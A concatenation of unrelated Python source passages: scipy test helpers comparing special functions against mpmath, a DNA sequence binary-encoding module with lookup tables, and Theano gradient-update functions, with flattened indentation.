file.write(contents)
file.close()
print 'Wrote ' + out_path
if __name__ == "__main__":
manager = SearchEngineManager()
manager.generateDefaultList()
for locale in locales:
manager.generateListForLocale(locale)
manager.writeAllEngines()
|
|
import os
import sys
import time
import numpy as np
from numpy.testing import assert_
import pytest
from scipy.special._testutils import assert_func_equal
try:
import mpmath # type: ignore[import]
except ImportError:
pass
# ------------------------------------------------------------------------------
# Machinery for systematic tests with mpmath
# ------------------------------------------------------------------------------
class Arg(object):
"""Generate a set of numbers on the real axis, concentrating on
'interesting' regions and covering all orders of magnitude.
"""
def __init__(self, a=-np.inf, b=np.inf, inclusive_a=True, inclusive_b=True):
if a > b:
raise ValueError("a should be less than or equal to b")
if a == -np.inf:
a = -0.5*np.finfo(float).max
if b == np.inf:
b = 0.5*np.finfo(float).max
self.a, self.b = a, b
self.inclusive_a, self.inclusive_b = inclusive_a, inclusive_b
def _positive_values(self, a, b, n):
if a < 0:
raise ValueError("a should be positive")
        # Try to put half of the points into a linspace between a and 10,
        # and the other half into a logspace.
if n % 2 == 0:
nlogpts = n//2
nlinpts = nlogpts
else:
nlogpts = n//2
nlinpts = nlogpts + 1
if a >= 10:
# Outside of linspace range; just return a logspace.
pts = np.logspace(np.log10(a), np.log10(b), n)
elif a > 0 and b < 10:
# Outside of logspace range; just return a linspace
pts = np.linspace(a, b, n)
elif a > 0:
# Linspace between a and 10 and a logspace between 10 and
# b.
linpts = np.linspace(a, 10, nlinpts, endpoint=False)
logpts = np.logspace(1, np.log10(b), nlogpts)
pts = np.hstack((linpts, logpts))
elif a == 0 and b <= 10:
# Linspace between 0 and b and a logspace between 0 and
# the smallest positive point of the linspace
linpts = np.linspace(0, b, nlinpts)
if linpts.size > 1:
right = np.log10(linpts[1])
else:
right = -30
logpts = np.logspace(-30, right, nlogpts, endpoint=False)
pts = np.hstack((logpts, linpts))
else:
# Linspace between 0 and 10, logspace between 0 and the
# smallest positive point of the linspace, and a logspace
# between 10 and b.
if nlogpts % 2 == 0:
nlogpts1 = nlogpts//2
nlogpts2 = nlogpts1
else:
nlogpts1 = nlogpts//2
nlogpts2 = nlogpts1 + 1
linpts = np.linspace(0, 10, nlinpts, endpoint=False)
if linpts.size > 1:
right = np.log10(linpts[1])
else:
right = -30
logpts1 = np.logspace(-30, right, nlogpts1, endpoint=False)
logpts2 = np.logspace(1, np.log10(b), nlogpts2)
pts = np.hstack((logpts1, linpts, logpts2))
return np.sort(pts)
def values(self, n):
"""Return an array containing n numbers."""
a, b = self.a, self.b
if a == b:
return np.zeros(n)
if not self.inclusive_a:
n += 1
if not self.inclusive_b:
n += 1
if n % 2 == 0:
n1 = n//2
n2 = n1
else:
n1 = n//2
n2 = n1 + 1
if a >= 0:
pospts = self._positive_values(a, b, n)
negpts = []
elif b <= 0:
pospts = []
negpts = -self._positive_values(-b, -a, n)
else:
pospts = self._positive_values(0, b, n1)
negpts = -self._positive_values(0, -a, n2 + 1)
# Don't want to get zero twice
negpts = negpts[1:]
pts = np.hstack((negpts[::-1], pospts))
if not self.inclusive_a:
pts = pts[1:]
if not self.inclusive_b:
pts = pts[:-1]
return pts
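# For illustration (not part of the test machinery itself): Arg(0, 1e4).values(20)
# mixes a linear grid below 10 with log-spaced points near zero and between 10
# and 1e4, so both the unit scale and the large-magnitude tail of the interval
# are exercised.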
class FixedArg(object):
def __init__(self, values):
self._values = np.asarray(values)
def values(self, n):
return self._values
class ComplexArg(object):
def __init__(self, a=complex(-np.inf, -np.inf), b=complex(np.inf, np.inf)):
self.real = Arg(a.real, b.real)
self.imag = Arg(a.imag, b.imag)
def values(self, n):
m = int(np.floor(np.sqrt(n)))
x = self.real.values(m)
y = self.imag.values(m + 1)
return (x[:,None] + 1j*y[None,:]).ravel()
class IntArg(object):
def __init__(self, a=-1000, b=1000):
self.a = a
self.b = b
def values(self, n):
v1 = Arg(self.a, self.b).values(max(1 + n//2, n-5)).astype(int)
v2 = np.arange(-5, 5)
v = np.unique(np.r_[v1, v2])
v = v[(v >= self.a) & (v < self.b)]
return v
def get_args(argspec, n):
if isinstance(argspec, np.ndarray):
args = argspec.copy()
else:
nargs = len(argspec)
ms = np.asarray([1.5 if isinstance(spec, ComplexArg) else 1.0 for spec in argspec])
ms = (n**(ms/sum(ms))).astype(int) + 1
args = [spec.values(m) for spec, m in zip(argspec, ms)]
args = np.array(np.broadcast_arrays(*np.ix_(*args))).reshape(nargs, -1).T
return args
class MpmathData(object):
def __init__(self, scipy_func, mpmath_func, arg_spec, name=None,
dps=None, prec=None, n=None, rtol=1e-7, atol=1e-300,
ignore_inf_sign=False, distinguish_nan_and_inf=True,
nan_ok=True, param_filter=None):
# mpmath tests are really slow (see gh-6989). Use a small number of
# points by default, increase back to 5000 (old default) if XSLOW is
# set
if n is None:
try:
is_xslow = int(os.environ.get('SCIPY_XSLOW', '0'))
except ValueError:
is_xslow = False
n = 5000 if is_xslow else 500
self.scipy_func = scipy_func
self.mpmath_func = mpmath_func
self.arg_spec = arg_spec
self.dps = dps
self.prec = prec
self.n = n
self.rtol = rtol
self.atol = atol
self.ignore_inf_sign = ignore_inf_sign
self.nan_ok = nan_ok
if isinstance(self.arg_spec, np.ndarray):
self.is_complex = np.issubdtype(self.arg_spec.dtype, np.complexfloating)
else:
self.is_complex = any([isinstance(arg, ComplexArg) for arg in self.arg_spec])
self.ignore_inf_sign = ignore_inf_sign
self.distinguish_nan_and_inf = distinguish_nan_and_inf
if not name or name == '<lambda>':
name = getattr(scipy_func, '__name__', None)
if not name or name == '<lambda>':
name = getattr(mpmath_func, '__name__', None)
self.name = name
self.param_filter = param_filter
def check(self):
np.random.seed(1234)
# Generate values for the arguments
argarr = get_args(self.arg_spec, self.n)
# Check
old_dps, old_prec = mpmath.mp.dps, mpmath.mp.prec
try:
if self.dps is not None:
dps_list = [self.dps]
else:
dps_list = [20]
if self.prec is not None:
mpmath.mp.prec = self.prec
# Proper casting of mpmath input and output types. Using
# native mpmath types as inputs gives improved precision
# in some cases.
if np.issubdtype(argarr.dtype, np.complexfloating):
pytype = mpc2complex
def mptype(x):
return mpmath.mpc(complex(x))
else:
def mptype(x):
return mpmath.mpf(float(x))
def pytype(x):
if abs(x.imag) > 1e-16*(1 + abs(x.real)):
return np.nan
else:
return mpf2float(x.real)
# Try out different dps until one (or none) works
for j, dps in enumerate(dps_list):
mpmath.mp.dps = dps
try:
assert_func_equal(self.scipy_func,
lambda *a: pytype(self.mpmath_func(*map(mptype, a))),
argarr,
vectorized=False,
rtol=self.rtol, atol=self.atol,
ignore_inf_sign=self.ignore_inf_sign,
distinguish_nan_and_inf=self.distinguish_nan_and_inf,
nan_ok=self.nan_ok,
param_filter=self.param_filter)
break
except AssertionError:
if j >= len(dps_list)-1:
# reraise the Exception
tp, value, tb = sys.exc_info()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
finally:
mpmath.mp.dps, mpmath.mp.prec = old_dps, old_prec
def __repr__(self):
if self.is_complex:
return "<MpmathData: %s (complex)>" % (self.name,)
else:
return "<MpmathData: %s>" % (self.name,)
def assert_mpmath_equal(*a, **kw):
d = MpmathData(*a, **kw)
d.check()
def nonfunctional_tooslow(func):
return pytest.mark.skip(reason=" Test not yet functional (too slow), needs more work.")(func)
# ------------------------------------------------------------------------------
# Tools for dealing with mpmath quirks
# ------------------------------------------------------------------------------
def mpf2float(x):
"""
Convert an mpf to the nearest floating point number. Just using
float directly doesn't work because of results like this:
with mp.workdps(50):
float(mpf("0.99999999999999999")) = 0.9999999999999999
"""
return float(mpmath.nstr(x, 17, min_fixed=0, max_fixed=0))
def mpc2complex(x):
return complex(mpf2float(x.real), mpf2float(x.imag))
def trace_args(func):
def tofloat(x):
if isinstance(x, mpmath.mpc):
return complex(x)
else:
return float(x)
def wrap(*a, **kw):
sys.stderr.write("%r: " % (tuple(map(tofloat, a)),))
sys.stderr.flush()
try:
r = func(*a, **kw)
sys.stderr.write("-> %r" % r)
finally:
sys.stderr.write("\n")
sys.stderr.flush()
return r
return wrap
try:
import posix
import signal
POSIX = ('setitimer' in dir(signal))
except ImportError:
POSIX = False
class TimeoutError(Exception):
pass
def time_limited(timeout=0.5, return_val=np.nan, use_sigalrm=True):
"""
Decorator for setting a timeout for pure-Python functions.
If the function does not return within `timeout` seconds, the
value `return_val` is returned instead.
    On POSIX this uses SIGALRM by default; on non-POSIX, settrace is
    used. Do not use this with threads: the SIGALRM implementation
    probably does not work well there, and the settrace implementation
    only traces the current thread.
    The settrace implementation also slows down execution; a slowdown
    by a factor of around 10 is typical.
"""
if POSIX and use_sigalrm:
def sigalrm_handler(signum, frame):
raise TimeoutError()
def deco(func):
def wrap(*a, **kw):
old_handler = signal.signal(signal.SIGALRM, sigalrm_handler)
signal.setitimer(signal.ITIMER_REAL, timeout)
try:
return func(*a, **kw)
except TimeoutError:
return return_val
finally:
signal.setitimer(signal.ITIMER_REAL, 0)
signal.signal(signal.SIGALRM, old_handler)
return wrap
else:
def deco(func):
def wrap(*a, **kw):
start_time = time.time()
def trace(frame, event, arg):
if time.time() - start_time > timeout:
raise TimeoutError()
return trace
sys.settrace(trace)
try:
return func(*a, **kw)
except TimeoutError:
sys.settrace(None)
return return_val
finally:
sys.settrace(None)
return wrap
return deco
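# Illustrative use of the decorator above (a sketch; the function name and
# timeout are made up):
#
#     @time_limited(timeout=0.1, return_val=np.nan)
#     def hangs_forever(x):
#         while True:
#             pass
#
# hangs_forever(1.0) then returns nan after roughly 0.1 seconds instead of
# blocking the test run.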
def exception_to_nan(func):
"""Decorate function to return nan if it raises an exception"""
def wrap(*a, **kw):
try:
return func(*a, **kw)
except Exception:
return np.nan
return wrap
def inf_to_nan(func):
"""Decorate function to return nan if it returns inf"""
def wrap(*a, **kw):
v = func(*a, **kw)
if not np.isfinite(v):
return np.nan
return v
return wrap
def mp_assert_allclose(res, std, atol=0, rtol=1e-17):
"""
Compare lists of mpmath.mpf's or mpmath.mpc's directly so that it
can be done to higher precision than double.
"""
try:
len(res)
except TypeError:
res = list(res)
n = len(std)
if len(res) != n:
raise AssertionError("Lengths of inputs not equal.")
failures = []
for k in range(n):
try:
assert_(mpmath.fabs(res[k] - std[k]) <= atol + rtol*mpmath.fabs(std[k]))
except AssertionError:
failures.append(k)
ndigits = int(abs(np.log10(rtol)))
msg = [""]
msg.append("Bad results ({} out of {}) for the following points:"
.format(len(failures), n))
for k in failures:
resrep = mpmath.nstr(res[k], ndigits, min_fixed=0, max_fixed=0)
stdrep = mpmath.nstr(std[k], ndigits, min_fixed=0, max_fixed=0)
if std[k] == 0:
rdiff = "inf"
else:
rdiff = mpmath.fabs((res[k] - std[k])/std[k])
rdiff = mpmath.nstr(rdiff, 3)
msg.append("{}: {} != {} (rdiff {})".format(k, resrep, stdrep, rdiff))
if failures:
assert_(False, "\n".join(msg))
|
|
'''
binary.py
Methods to translate DNA sequences to integers via binary
intermediates (for more efficient memory usage)
'''
# Lookup tables
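# Each base maps to two bits (A=00, C=01, G=10, T/U=11), so a 4-mer packs into
# a single byte. The tables below map 4-mer strings to byte values (_LUTsb),
# byte values back to 4-mer strings (_LUTis), and byte values to their
# complemented (_LUTic), reversed (_LUTir) and reverse-complemented (_LUTirc)
# counterparts.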
_LUTsb = {'AAAA':0x0,'AAAC':0x1,'AAAG':0x2,'AAAT':0x3,'AACA':0x4,'AACC':0x5,
'AACG':0x6,'AACT':0x7,'AAGA':0x8,'AAGC':0x9,'AAGG':0xa,'AAGT':0xb,'AATA':0xc,
'AATC':0xd,'AATG':0xe,'AATT':0xf,'ACAA':0x10,'ACAC':0x11,'ACAG':0x12,
'ACAT':0x13,'ACCA':0x14,'ACCC':0x15,'ACCG':0x16,'ACCT':0x17,'ACGA':0x18,
'ACGC':0x19,'ACGG':0x1a,'ACGT':0x1b,'ACTA':0x1c,'ACTC':0x1d,'ACTG':0x1e,
'ACTT':0x1f,'AGAA':0x20,'AGAC':0x21,'AGAG':0x22,'AGAT':0x23,'AGCA':0x24,
'AGCC':0x25,'AGCG':0x26,'AGCT':0x27,'AGGA':0x28,'AGGC':0x29,'AGGG':0x2a,
'AGGT':0x2b,'AGTA':0x2c,'AGTC':0x2d,'AGTG':0x2e,'AGTT':0x2f,'ATAA':0x30,
'ATAC':0x31,'ATAG':0x32,'ATAT':0x33,'ATCA':0x34,'ATCC':0x35,'ATCG':0x36,
'ATCT':0x37,'ATGA':0x38,'ATGC':0x39,'ATGG':0x3a,'ATGT':0x3b,'ATTA':0x3c,
'ATTC':0x3d,'ATTG':0x3e,'ATTT':0x3f,'CAAA':0x40,'CAAC':0x41,'CAAG':0x42,
'CAAT':0x43,'CACA':0x44,'CACC':0x45,'CACG':0x46,'CACT':0x47,'CAGA':0x48,
'CAGC':0x49,'CAGG':0x4a,'CAGT':0x4b,'CATA':0x4c,'CATC':0x4d,'CATG':0x4e,
'CATT':0x4f,'CCAA':0x50,'CCAC':0x51,'CCAG':0x52,'CCAT':0x53,'CCCA':0x54,
'CCCC':0x55,'CCCG':0x56,'CCCT':0x57,'CCGA':0x58,'CCGC':0x59,'CCGG':0x5a,
'CCGT':0x5b,'CCTA':0x5c,'CCTC':0x5d,'CCTG':0x5e,'CCTT':0x5f,'CGAA':0x60,
'CGAC':0x61,'CGAG':0x62,'CGAT':0x63,'CGCA':0x64,'CGCC':0x65,'CGCG':0x66,
'CGCT':0x67,'CGGA':0x68,'CGGC':0x69,'CGGG':0x6a,'CGGT':0x6b,'CGTA':0x6c,
'CGTC':0x6d,'CGTG':0x6e,'CGTT':0x6f,'CTAA':0x70,'CTAC':0x71,'CTAG':0x72,
'CTAT':0x73,'CTCA':0x74,'CTCC':0x75,'CTCG':0x76,'CTCT':0x77,'CTGA':0x78,
'CTGC':0x79,'CTGG':0x7a,'CTGT':0x7b,'CTTA':0x7c,'CTTC':0x7d,'CTTG':0x7e,
'CTTT':0x7f,'GAAA':0x80,'GAAC':0x81,'GAAG':0x82,'GAAT':0x83,'GACA':0x84,
'GACC':0x85,'GACG':0x86,'GACT':0x87,'GAGA':0x88,'GAGC':0x89,'GAGG':0x8a,
'GAGT':0x8b,'GATA':0x8c,'GATC':0x8d,'GATG':0x8e,'GATT':0x8f,'GCAA':0x90,
'GCAC':0x91,'GCAG':0x92,'GCAT':0x93,'GCCA':0x94,'GCCC':0x95,'GCCG':0x96,
'GCCT':0x97,'GCGA':0x98,'GCGC':0x99,'GCGG':0x9a,'GCGT':0x9b,'GCTA':0x9c,
'GCTC':0x9d,'GCTG':0x9e,'GCTT':0x9f,'GGAA':0xa0,'GGAC':0xa1,'GGAG':0xa2,
'GGAT':0xa3,'GGCA':0xa4,'GGCC':0xa5,'GGCG':0xa6,'GGCT':0xa7,'GGGA':0xa8,
'GGGC':0xa9,'GGGG':0xaa,'GGGT':0xab,'GGTA':0xac,'GGTC':0xad,'GGTG':0xae,
'GGTT':0xaf,'GTAA':0xb0,'GTAC':0xb1,'GTAG':0xb2,'GTAT':0xb3,'GTCA':0xb4,
'GTCC':0xb5,'GTCG':0xb6,'GTCT':0xb7,'GTGA':0xb8,'GTGC':0xb9,'GTGG':0xba,
'GTGT':0xbb,'GTTA':0xbc,'GTTC':0xbd,'GTTG':0xbe,'GTTT':0xbf,'TAAA':0xc0,
'TAAC':0xc1,'TAAG':0xc2,'TAAT':0xc3,'TACA':0xc4,'TACC':0xc5,'TACG':0xc6,
'TACT':0xc7,'TAGA':0xc8,'TAGC':0xc9,'TAGG':0xca,'TAGT':0xcb,'TATA':0xcc,
'TATC':0xcd,'TATG':0xce,'TATT':0xcf,'TCAA':0xd0,'TCAC':0xd1,'TCAG':0xd2,
'TCAT':0xd3,'TCCA':0xd4,'TCCC':0xd5,'TCCG':0xd6,'TCCT':0xd7,'TCGA':0xd8,
'TCGC':0xd9,'TCGG':0xda,'TCGT':0xdb,'TCTA':0xdc,'TCTC':0xdd,'TCTG':0xde,
'TCTT':0xdf,'TGAA':0xe0,'TGAC':0xe1,'TGAG':0xe2,'TGAT':0xe3,'TGCA':0xe4,
'TGCC':0xe5,'TGCG':0xe6,'TGCT':0xe7,'TGGA':0xe8,'TGGC':0xe9,'TGGG':0xea,
'TGGT':0xeb,'TGTA':0xec,'TGTC':0xed,'TGTG':0xee,'TGTT':0xef,'TTAA':0xf0,
'TTAC':0xf1,'TTAG':0xf2,'TTAT':0xf3,'TTCA':0xf4,'TTCC':0xf5,'TTCG':0xf6,
'TTCT':0xf7,'TTGA':0xf8,'TTGC':0xf9,'TTGG':0xfa,'TTGT':0xfb,'TTTA':0xfc,
'TTTC':0xfd,'TTTG':0xfe,'TTTT':0xff}
_LUTis = ['AAAA','AAAC','AAAG','AAAT','AACA','AACC','AACG','AACT','AAGA','AAGC',
'AAGG','AAGT','AATA','AATC','AATG','AATT','ACAA','ACAC','ACAG','ACAT','ACCA',
'ACCC','ACCG','ACCT','ACGA','ACGC','ACGG','ACGT','ACTA','ACTC','ACTG','ACTT',
'AGAA','AGAC','AGAG','AGAT','AGCA','AGCC','AGCG','AGCT','AGGA','AGGC','AGGG',
'AGGT','AGTA','AGTC','AGTG','AGTT','ATAA','ATAC','ATAG','ATAT','ATCA','ATCC',
'ATCG','ATCT','ATGA','ATGC','ATGG','ATGT','ATTA','ATTC','ATTG','ATTT','CAAA',
'CAAC','CAAG','CAAT','CACA','CACC','CACG','CACT','CAGA','CAGC','CAGG','CAGT',
'CATA','CATC','CATG','CATT','CCAA','CCAC','CCAG','CCAT','CCCA','CCCC','CCCG',
'CCCT','CCGA','CCGC','CCGG','CCGT','CCTA','CCTC','CCTG','CCTT','CGAA','CGAC',
'CGAG','CGAT','CGCA','CGCC','CGCG','CGCT','CGGA','CGGC','CGGG','CGGT','CGTA',
'CGTC','CGTG','CGTT','CTAA','CTAC','CTAG','CTAT','CTCA','CTCC','CTCG','CTCT',
'CTGA','CTGC','CTGG','CTGT','CTTA','CTTC','CTTG','CTTT','GAAA','GAAC','GAAG',
'GAAT','GACA','GACC','GACG','GACT','GAGA','GAGC','GAGG','GAGT','GATA','GATC',
'GATG','GATT','GCAA','GCAC','GCAG','GCAT','GCCA','GCCC','GCCG','GCCT','GCGA',
'GCGC','GCGG','GCGT','GCTA','GCTC','GCTG','GCTT','GGAA','GGAC','GGAG','GGAT',
'GGCA','GGCC','GGCG','GGCT','GGGA','GGGC','GGGG','GGGT','GGTA','GGTC','GGTG',
'GGTT','GTAA','GTAC','GTAG','GTAT','GTCA','GTCC','GTCG','GTCT','GTGA','GTGC',
'GTGG','GTGT','GTTA','GTTC','GTTG','GTTT','TAAA','TAAC','TAAG','TAAT','TACA',
'TACC','TACG','TACT','TAGA','TAGC','TAGG','TAGT','TATA','TATC','TATG','TATT',
'TCAA','TCAC','TCAG','TCAT','TCCA','TCCC','TCCG','TCCT','TCGA','TCGC','TCGG',
'TCGT','TCTA','TCTC','TCTG','TCTT','TGAA','TGAC','TGAG','TGAT','TGCA','TGCC',
'TGCG','TGCT','TGGA','TGGC','TGGG','TGGT','TGTA','TGTC','TGTG','TGTT','TTAA',
'TTAC','TTAG','TTAT','TTCA','TTCC','TTCG','TTCT','TTGA','TTGC','TTGG','TTGT',
'TTTA','TTTC','TTTG','TTTT']
_LUTic = bytearray(b'\xff\xfe\xfd\xfc\xfb\xfa\xf9\xf8\xf7\xf6\xf5\xf4\xf3\xf2'
'\xf1\xf0\xef\xee\xed\xec\xeb\xea\xe9\xe8\xe7\xe6\xe5\xe4\xe3\xe2\xe1\xe0\xdf'
'\xde\xdd\xdc\xdb\xda\xd9\xd8\xd7\xd6\xd5\xd4\xd3\xd2\xd1\xd0\xcf\xce\xcd\xcc'
'\xcb\xca\xc9\xc8\xc7\xc6\xc5\xc4\xc3\xc2\xc1\xc0\xbf\xbe\xbd\xbc\xbb\xba\xb9'
'\xb8\xb7\xb6\xb5\xb4\xb3\xb2\xb1\xb0\xaf\xae\xad\xac\xab\xaa\xa9\xa8\xa7\xa6'
'\xa5\xa4\xa3\xa2\xa1\xa0\x9f\x9e\x9d\x9c\x9b\x9a\x99\x98\x97\x96\x95\x94\x93'
'\x92\x91\x90\x8f\x8e\x8d\x8c\x8b\x8a\x89\x88\x87\x86\x85\x84\x83\x82\x81\x80'
'\x7f~}|{zyxwvutsrqponmlkjihgfedcba`_^]\\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:987'
'6543210/.-,+*)(\'&%$#"! \x1f\x1e\x1d\x1c\x1b\x1a\x19\x18\x17\x16\x15\x14\x13'
'\x12\x11\x10\x0f\x0e\r\x0c\x0b\n\t\x08\x07\x06\x05\x04\x03\x02\x01\x00')
_LUTir = bytearray(b'\x00@\x80\xc0\x10P\x90\xd0 `\xa0\xe00p\xb0\xf0\x04D\x84'
'\xc4\x14T\x94\xd4$d\xa4\xe44t\xb4\xf4\x08H\x88\xc8\x18X\x98\xd8(h\xa8\xe88x'
'\xb8\xf8\x0cL\x8c\xcc\x1c\\\x9c\xdc,l\xac\xec<|\xbc\xfc\x01A\x81\xc1\x11Q\x91'
'\xd1!a\xa1\xe11q\xb1\xf1\x05E\x85\xc5\x15U\x95\xd5%e\xa5\xe55u\xb5\xf5\tI\x89'
'\xc9\x19Y\x99\xd9)i\xa9\xe99y\xb9\xf9\rM\x8d\xcd\x1d]\x9d\xdd-m\xad\xed=}\xbd'
'\xfd\x02B\x82\xc2\x12R\x92\xd2"b\xa2\xe22r\xb2\xf2\x06F\x86\xc6\x16V\x96\xd6&f'
'\xa6\xe66v\xb6\xf6\nJ\x8a\xca\x1aZ\x9a\xda*j\xaa\xea:z\xba\xfa\x0eN\x8e\xce'
'\x1e^\x9e\xde.n\xae\xee>~\xbe\xfe\x03C\x83\xc3\x13S\x93\xd3#c\xa3\xe33s\xb3'
'\xf3\x07G\x87\xc7\x17W\x97\xd7\'g\xa7\xe77w\xb7\xf7\x0bK\x8b\xcb\x1b[\x9b'
'\xdb+k\xab\xeb;{\xbb\xfb\x0fO\x8f\xcf\x1f_\x9f\xdf/o\xaf\xef?\x7f\xbf\xff')
_LUTirc = bytearray(b'\xff\xbf\x7f?\xef\xafo/\xdf\x9f_\x1f\xcf\x8fO\x0f\xfb\xbb'
'{;\xeb\xabk+\xdb\x9b[\x1b\xcb\x8bK\x0b\xf7\xb7w7\xe7\xa7g\'\xd7\x97W\x17\xc7'
'\x87G\x07\xf3\xb3s3\xe3\xa3c#\xd3\x93S\x13\xc3\x83C\x03\xfe\xbe~>\xee\xaen.'
'\xde\x9e^\x1e\xce\x8eN\x0e\xfa\xbaz:\xea\xaaj*\xda\x9aZ\x1a\xca\x8aJ\n\xf6'
'\xb6v6\xe6\xa6f&\xd6\x96V\x16\xc6\x86F\x06\xf2\xb2r2\xe2\xa2b"\xd2\x92R\x12'
'\xc2\x82B\x02\xfd\xbd}=\xed\xadm-\xdd\x9d]\x1d\xcd\x8dM\r\xf9\xb9y9\xe9\xa9i)'
'\xd9\x99Y\x19\xc9\x89I\t\xf5\xb5u5\xe5\xa5e%\xd5\x95U\x15\xc5\x85E\x05\xf1'
'\xb1q1\xe1\xa1a!\xd1\x91Q\x11\xc1\x81A\x01\xfc\xbc|<\xec\xacl,\xdc\x9c\\\x1c'
'\xcc\x8cL\x0c\xf8\xb8x8\xe8\xa8h(\xd8\x98X\x18\xc8\x88H\x08\xf4\xb4t4\xe4'
'\xa4d$\xd4\x94T\x14\xc4\x84D\x04\xf0\xb0p0\xe0\xa0` \xd0\x90P\x10\xc0\x80@'
'\x00')
class Basic:
''' Encodes DNA sequences without a lookup table '''
_seq_bin = {'A':'00', 'T':'11', 'U':'11', 'G':'10', 'C':'01'}
_bin_seq_dna = {'00':'A', '11':'T', '10':'G', '01':'C'}
_bin_seq_rna = {'00':'A', '11':'U', '10':'G', '01':'C'}
@staticmethod
def _seq_to_bin(seq):
return ''.join([Basic._seq_bin[b] for b in seq])
@staticmethod
def _bin_to_seq(binary, na_type='DNA'):
to_seq = Basic._bin_seq_dna if na_type == 'DNA' else Basic._bin_seq_rna
return ''.join([to_seq[binary[x:x+2]] for x in
xrange(0, len(binary)-1, 2)])
@staticmethod
def decode(integer, length, na_type='DNA'):
b = bin(integer)[2:]
b_padded = '0' * (length * 2 - len(b)) + b
return Basic._bin_to_seq(b_padded, na_type=na_type)
@staticmethod
def encode(seq):
''' Returns an integer representation of seq as well as its length '''
return int(Basic._seq_to_bin(seq), 2), len(seq)
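# Worked example for the class above (values follow from the 2-bit mapping and
# are shown only as an illustration):
#     Basic.encode('ACGT')  ->  (0b00011011, 4) == (27, 4)
#     Basic.decode(27, 4)   ->  'ACGT'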
class BinarySeq:
'''
Encodes DNA sequences with a lookup table and performs basic operations
(complement, reverse, reverse-complement)
'''
@staticmethod
def encode(seq):
sb = _LUTsb#_seq_byte
L = len(seq)
pad = 4 - ((L % 4) or 4)
seq += pad * 'A'
return bytearray([pad] + [sb[seq[b:b+4]] for b in xrange(0, L, 4)])
@staticmethod
def decode(seq_ba):
ts = _LUTis
offset = seq_ba[0]
front = offset & 0x04
idx = offset & 0x03
        # if the 0x04 flag is set the sequence was reversed, so the padding (and
        # therefore the offset) applies to the front; otherwise it applies to the rear
if front:
start = idx
stop = None
else:
start = 0
stop = -idx or None
return ''.join([ts[val] for val in seq_ba[1:]])[start:stop]
    @staticmethod
    def rev(seq_ba):
        r = _LUTir
        n = len(seq_ba) - 1  # number of data bytes; byte 0 holds the pad/flag header
        for i in xrange(n // 2):
            seq_ba[1+i], seq_ba[n-i] = r[seq_ba[n-i]], r[seq_ba[1+i]]
        if n % 2:  # an odd byte count leaves a middle byte to reverse in place
            seq_ba[n // 2 + 1] = r[seq_ba[n // 2 + 1]]
        # toggle the 0x04 flag so decode() knows the padding now sits at the front
        seq_ba[0] = (seq_ba[0] ^ 0x04)
        return seq_ba
    @staticmethod
    def rev_compl(seq_ba):
        rc = _LUTirc
        n = len(seq_ba) - 1  # number of data bytes; byte 0 holds the pad/flag header
        for i in xrange(n // 2):
            seq_ba[1+i], seq_ba[n-i] = rc[seq_ba[n-i]], rc[seq_ba[1+i]]
        if n % 2:  # an odd byte count leaves a middle byte to reverse-complement in place
            seq_ba[n // 2 + 1] = rc[seq_ba[n // 2 + 1]]
        # toggle the 0x04 flag so decode() knows the padding now sits at the front
        seq_ba[0] = (seq_ba[0] ^ 0x04)
        return seq_ba
@staticmethod
def compl(seq_ba):
c = _LUTic
for i in xrange(1, len(seq_ba)):
seq_ba[i] = c[seq_ba[i]]
return seq_ba
##### Test code below #####
if __name__ == '__main__':
import random
import cProfile
import timeit
def testBasic():
global rseq_out
for x in xrange(10000):
a = Basic.encode(rseq)
rseq_out = Basic.decode(*a)
def testBinarySeq():
global rseq_out
for x in xrange(10000):
enc = BinarySeq.encode(rseq)
rseq_out = BinarySeq.decode(enc)
print '-->Timed 10000X for 25mer:'
rseq = ''.join([random.choice('ATGC') for x in xrange(25)])
a = timeit.Timer('testBasic()', 'from __main__ import testBasic')
print 'Basic:', a.timeit(1)
c = timeit.Timer('testBinarySeq()', 'from __main__ import testBinarySeq')
print 'BinarySeq:', c.timeit(1)
# cProfile.run('testBasic()')
# cProfile.run('testBinarySeq()')
print '\n--->Timed 10000X for 500mer:'
rseq = ''.join([random.choice('ATGC') for x in xrange(500)])
a = timeit.Timer('testBasic()', 'from __main__ import testBasic')
print 'Basic:', a.timeit(1)
c = timeit.Timer('testBinarySeq()', 'from __main__ import testBinarySeq')
print 'BinarySeq:', c.timeit(1)
# cProfile.run('testBasic()')
# cProfile.run('testBinarySeq()')
print '\nFull test suite with BinarySeq: '
rseq = ''.join([random.choice('ATGC') for x in xrange(random.randint(20,30))])
print 'random_seq_in:\t\t\t', rseq
enc = BinarySeq.encode(rseq)
print 'random_seq_out:\t\t\t', BinarySeq.decode(enc)
enc = BinarySeq.encode(rseq)
print 'random_seq_compl:\t\t', BinarySeq.decode(BinarySeq.compl(enc))
enc = BinarySeq.encode(rseq)
print 'random_seq_rev:\t\t\t', BinarySeq.decode(BinarySeq.rev(enc))
enc = BinarySeq.encode(rseq)
print 'random_seq_rev_compl:\t', BinarySeq.decode(BinarySeq.rev_compl(enc))
|
|
"""
Functions to generate Theano update dictionaries for training.
"""
import numpy as np
import theano
import theano.tensor as T
def sgd(loss, all_params, learning_rate):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
updates.append((param_i, param_i - learning_rate * grad_i))
return updates
def momentum(loss, all_params, learning_rate, momentum=0.9):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
mparam_i = theano.shared(np.zeros(param_i.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param_i.broadcastable)
v = momentum * mparam_i - learning_rate * grad_i
updates.append((mparam_i, v))
updates.append((param_i, param_i + v))
return updates
# using the alternative formulation of nesterov momentum described at
# https://github.com/lisa-lab/pylearn2/pull/136
# such that the gradient can be evaluated at the current parameters.
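# Written out, the update implemented below is
#     v_new = momentum * v - learning_rate * grad(p)
#     p_new = p + momentum * v_new - learning_rate * grad(p)
# which is the classical Nesterov update re-expressed so that the gradient is
# taken at the current parameter values (see the pylearn2 pull request above).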
def nesterov_momentum(loss, all_params, learning_rate, momentum=0.9):
all_grads = theano.grad(loss, all_params)
updates = []
for param_i, grad_i in zip(all_params, all_grads):
mparam_i = theano.shared(np.zeros(param_i.get_value().shape,
dtype=theano.config.floatX),
broadcastable=param_i.broadcastable)
        v = momentum * mparam_i - learning_rate * grad_i # new momentum
w = param_i + momentum * v - learning_rate * grad_i # new param values
updates.append((mparam_i, v))
updates.append((param_i, w))
return updates
def adagrad(loss, all_params, learning_rate=1.0, epsilon=1e-6):
"""
    epsilon is not included in the typical formula;
    see "Notes on AdaGrad" by Chris Dyer for more info.
"""
